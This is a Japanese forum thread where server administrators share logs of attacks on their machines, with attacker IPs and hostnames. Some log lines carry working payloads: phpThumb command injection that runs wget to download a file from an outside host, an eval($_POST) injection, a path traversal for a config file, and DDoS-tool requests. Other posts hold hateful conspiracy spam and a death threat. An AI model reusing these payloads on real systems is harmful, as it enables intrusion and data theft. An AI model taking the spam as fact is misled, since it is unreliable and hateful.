アタックNo1してきたIPを晒すスレ

**DNS未登録さん** · 2011/02/01(火) 23:36:21

涙が出ちゃう

**DNS未登録さん** · 2011/08/15(月) 01:57:14.43

202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:36 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:39 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:40 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-

**DNS未登録さん** · 2011/09/02(金) 20:25:03.05

126.26.247.186　

**DNS未登録さん** · 2011/09/03(土) 15:39:24.21

sdcドメインはクズ。

**DNS未登録さん** · 2011/11/03(木) 01:26:14.18

79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"

こんなふうにパラメータ変えてアタックしてくる。
もう１週間くらい同じIPからのアタックが続いてるよ、逆引きすると
backup01.xsltel.me

**DNS未登録さん** · 2011/11/03(木) 13:25:08.00

？(？？？ ) ？

**DNS未登録さん** · 2011/11/03(木) 17:40:46.68

>103
特定できてるなら、ブロックすりゃ済む話だろ...

**DNS未登録さん** · 2011/11/03(木) 22:58:30.29

このスレはそのアタックNo1してきたURIやら状況を書いて
みんなに参考にしてもらうための情報共有スレなんですけどね

**DNS未登録さん** · 2011/11/29(火) 14:05:13.01

>>105
スレタイ嫁ｋｓ

**DNS未登録さん** · 2011/11/29(火) 20:48:34.88

# grep 222.229.65.227 auth.log|head -2
Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227
Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2

# grep 222.229.65.227 auth.log|tail -1
Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2

# grep 222.229.65.227 auth.log|wc
1846 25606 185870

# host iacp-gw.kochi-tech.ac.jp
iacp-gw.kochi-tech.ac.jp has address 222.229.65.227

管理者がんがれ～。

**DNS未登録さん** · 2011/12/13(火) 03:47:11.79

アタック25

**八犬伝＝γδεζηθ＝еёжЭЮЯабЧЦХЛθ** · 2011/12/16(金) 18:10:07.04

２００２の「アルゼンチンvsイングランド」と「決勝」を朝鮮総連を騙し、観戦した少頭劣一族のアミ…立て籠り犯朝鮮総連少頭劣一族の真の最終目的は徳川の財産を全て奪い
日本の芸能人を多数中国へ拉致し、
あちらで更に監禁し働かせ
自分達家族は優雅に国に土地を買い
自分達の国にし遊んで暮らすつもりだった。
日本の芸能人を色々な奴隷にすると言っていた。日本列島は棄てる。
中国へ帰る家族のみが立て籠り犯だ。
次に狙うのはイタリアだったらしい。
おまぬ～！
フィリピンの范蘭と西太后の所からモンゴルに逃げた『シバ』の子達だ。

**DNS未登録さん** · 2011/12/18(日) 16:05:00.40

同一プロバイダから昨日と今日で3回アタックしてきやがった
114.51.19.152

**Elena Oda Vintevecom Lamcasta** · 2011/12/19(月) 17:42:04.86

今、まともなサーバーは Googleのみ。
確認するべき。

Googleで
インターネットテレビ朝鮮総連少頭劣一族自民党立て籠人質(又はハッキング)
を検索して各方面に連絡お願い致します。

インターネットテレビ自分の本名８桁の生年月日
で自分の犯罪も分かるかも。

掟破りのコピペ犯は私です。
犯罪解決の為に朝鮮人と華喃少頭劣一族＝蔗冽一族と日本中…更にGoogleで御覧の世界中の方々に閲覧して頂いております。
２チャンも私が貼る場所は閲覧して頂いております。
人質は世界中の国のトップと国連とFreemason 全メンバーですから…日本中愚か者ばかりで嘆かわしい限り。

**DNS未登録さん** · 2011/12/20(火) 02:27:06.15

韓国人の俺が記念カキコ

**DNS未登録さん** · 2011/12/22(木) 10:56:56.35

毎日同一人物だと思われるｋｓからアタックされ続けている

94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"

**DNS未登録さん** · 2011/12/27(火) 05:53:44.16

国籍調べたらどうもフランスらしいけど、フランスの糞餓鬼かな　コロスぞ　ゴラァ

91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7

**DNS未登録さん** · 2011/12/27(火) 09:14:56.24

>>115
whois情報だとdedicated serverって書いてあるから、
レンタルサーバか何かだろう。

あとphpThumb()と呼ばれるツールの脆弱性を突いて、
サーバ上でコマンドを実行しようとしているところから
すると、おそらく対象のサーバは乗っ取られんではないかな。

**DNS未登録さん** · 2012/01/09(月) 07:21:01.65

IPアドレス 175.105.126.4
ホスト名 4.126.105.175.ap.yournet.ne.jp
IPアドレス割当国日本 ( jp )
市外局番該当なし
接続回線種別不明
都道府県大阪府
IPひろば検索ランキング 17位 (48Point)

**DNS未登録さん** · 2012/01/09(月) 14:27:12.55

安藤優子、木村太郎は、某プロパイダの社外取締役、かつ、安藤は、フジ社外の人間にもかかわらず、フジテレビジョンのM&Aの最中、フジのホワイトナ
イトの【親会社】の本業を無視して、「インターネットは虚業だ。具体性がない
。」というようなことをコメントしました。この虚業は、livedoorを指していた
としても、「同業者」であったということは、非常に、違和感を感じずには、い
られません。

**DNS未登録さん** · 2012/01/10(火) 06:06:43.39

78.46.89.6 (liventura-grid.com)

2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-"
2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-"
以下pma関係を主に百数十回

**DNS未登録さん** · 2012/01/10(火) 07:57:02.93

>>119
セキュリティホールを突いてくるなんてどこのどいつだよ、
と思ったらドイツだった。

**DNS未登録さん** · 2012/02/24(金) 15:30:49.31

久しぶりに来た
184.105.65.228 guardlayer.com - 2012-02-24 10:06:04 GET /muieblackcat HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //db/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //dbadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //myadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //mysql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //mysqladmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //typo3/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //xampp/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //websql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin-2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.3/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.5.1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.4/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.7/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:16 GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1 404 385 - -

**DNS未登録さん** · 2012/02/24(金) 22:18:52.87

>>121
うちでも13時と20時頃に同じのが来てるわ

**DNS未登録さん** · 2012/02/27(月) 15:21:12.38

175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-"
なにこれ怖い
韓国(´・д・｀)ﾔﾀﾞ

**DNS未登録さん** · 2012/03/03(土) 12:42:17.26

Googleから大量アクセスの一部
検索用botとはまた違うみたいだ

74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Blackberry8520/5.0.0.822 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (Series40; NokiaC3-00/03.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.10.15
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - SAMSUNG-GT-C3200/1.0 NetFront/3.5 Profile/M IDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Opera/9.50 (J2ME/MIDP; Opera Mini/4.0.8462/8; U; en)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - SoftBank/1.0/920SH/SHJ001 Browser/NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - KDDI-CA3A UP.Browser/6.2.0.13.2 (GUI) MMP/2.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - DoCoMo/2.0 P906i(c100;TB;W24H15)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413

**DNS未登録さん** · 2012/03/11(日) 20:16:26.37

70.62.198.26
rrcs-70-62-198-26.central.biz.rr.com
しつこい

**DNS未登録さん** · 2012/03/13(火) 13:35:01.04

荒らしやめろ

ip：218.218.181.166
host：KYNfb-02p1-166.ppp11.odn.ad.jp
UA：Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61

**DNS未登録さん** · 2012/03/13(火) 18:02:50.59

>126
国内なら相手ISPにログ付きで苦情を送れ。大抵それで方がつく。

**DNS未登録さん** · 2012/03/14(水) 12:25:43.44

甘いところだと注意しただけで大して変わらないこともあるけどね
厳しいところは一発で回線停止されるけど
odnはどうだったかな…

**DNS未登録さん** · 2012/03/25(日) 17:27:49.33

"217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com"
8000行あった。数秒おきに 16時間・・・

**DNS未登録さん** · 2012/05/11(金) 23:49:56.91

64.27.15.56　アメリカunassigned.calpop.com
メール鯖にアタックしてくる

**DNS未登録さん** · 2012/05/12(土) 19:12:28.08

116.126.87.154 韓国
[Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1
[Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1

他137種類のattack
？？？

**DNS未登録さん** · 2012/05/13(日) 23:47:03.33

日本国内からのポートスキャン、クラックツール実行

49.252.168.148
EM49-252-168-148.pool.e-mobile.ne.jp.

**DNS未登録さん** · 2012/05/25(金) 10:24:33.62

217.41.19.142

dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx
dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx

**DNS未登録さん** · 2012/05/28(月) 11:47:02.67

[error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin
[error] [client 65.74.155.211] File does not exist: /var/www/html/pma
[error] [client 65.74.155.211] File does not exist: /var/www/html/mysql

**DNS未登録さん** · 2012/05/31(木) 00:08:01.47

日本国内からくる奴は、OCNが多いが理由があるのだろうか？

**DNS未登録さん** · 2012/05/31(木) 02:45:10.02

ユーザ数

**DNS未登録さん** · 2012/05/31(木) 22:48:38.01

YokozunaNETという謎のISPからDDOS食らった

**DNS未登録さん** · 2012/06/01(金) 11:34:04.46

モンゴルかｗ

**DNS未登録さん** · 2012/08/01(水) 22:49:19.71

ポート２２に侵入しようとしてくる
www23111u.sakura.ne.jp
www3079uh.sakura.ne.jp
www7183ue.sakura.ne.jp
www18135ue.sakura.ne.jp

**DNS未登録さん** · 2012/08/06(月) 04:40:39.11

ssh（dd_ssh）攻撃

1.33.202.193
el-labo-s1.el-labo.jp

**DNS未登録さん** · 2012/08/13(月) 09:46:36.18

このスレまだあるんだね。
ssh対策なら、denyhosts動かしておけば自動収集してくれるのに。
purge_deny=1yにしておいたら、こんなに収集してくれたよ。

% egrep ^sshd /etc/hosts.deny | wc -l
968

**DNS未登録さん** · 2012/08/15(水) 17:20:46.24

218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:-

**DNS未登録さん** · 2012/08/17(金) 07:53:18.68

>>141
こいつ馬鹿だわ
期間も書かずに、こんなにとか言ってるし

**DNS未登録さん** · 2012/08/19(日) 17:46:16.25

夏だねぇ。
purge_deny=1y
の意味ぐらい調べてから書けば良いのに。

**DNS未登録さん** · 2012/08/19(日) 19:09:29.95

そういう意味じゃないと思われ
夏だな、電波野郎しかいないのか

**DNS未登録さん** · 2012/08/21(火) 16:50:28.60

2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-"

**DNS未登録さん** · 2012/08/22(水) 21:59:46.11

1年でpurgeするのだから、1年分の収集だろうが... ヤレヤレ。

**DNS未登録さん** · 2012/09/18(火) 20:47:17.39

203.91.121.70

毎日一万回以上うちのサーバーにssh総当たりしてくる

何か怖い

**DNS未登録さん** · 2012/09/19(水) 00:57:11.55

>>148
そう思ってる奴は他にもいる
ttp://ip-address-lookup-v4.com/ip/203.91.121.70

**DNS未登録さん** · 2012/09/22(土) 21:35:02.21

58.183.165.251
違法物をやりとりするサーバーを立てています。
http://awabi.2ch.net/test/read.cgi/download/1347785389/
このスレで ID:SLuCn6vK0 大暴れしている
女子供を晒しアゲ中傷の嵐

